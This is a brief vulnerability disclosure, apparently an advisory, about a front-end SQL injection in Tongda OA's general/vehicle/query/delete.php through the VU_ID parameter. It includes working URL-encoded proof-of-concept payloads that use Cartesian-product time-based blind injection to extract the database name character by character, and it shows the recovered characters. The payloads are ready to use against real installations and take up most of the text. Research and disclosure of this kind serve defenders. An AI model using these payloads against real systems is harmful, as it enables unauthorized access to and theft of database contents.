Tongda OA has a front-end SQL injection vulnerability
Route: general/vehicle/query/delete.php
There are injected parameters: $VU_ID
The code here is very concise. When $VU_ID is not empty, the parameters are directly spliced into the SQL statement. Since the parentheses are closed here, there is a bypass.
2.Payload We can use Cartesian product blind injection for injection. The following payload can determine that the first character of the database name is t, because it was successfully delayed at 116. The ASCII code 116 also corresponds to the lowercase letter t. By analogy, the database name and any information about the database can be obtained through blind injection. POC
1)%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
Intercept the second digit of the database through blind injection, and determine the second digit as the letter d through the delay time
POC
1)%20and%20(substr(DATABASE(),2,1))=char(100)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
The third digit is the character _
The fourth digit is the character o
The fifth digit is the character a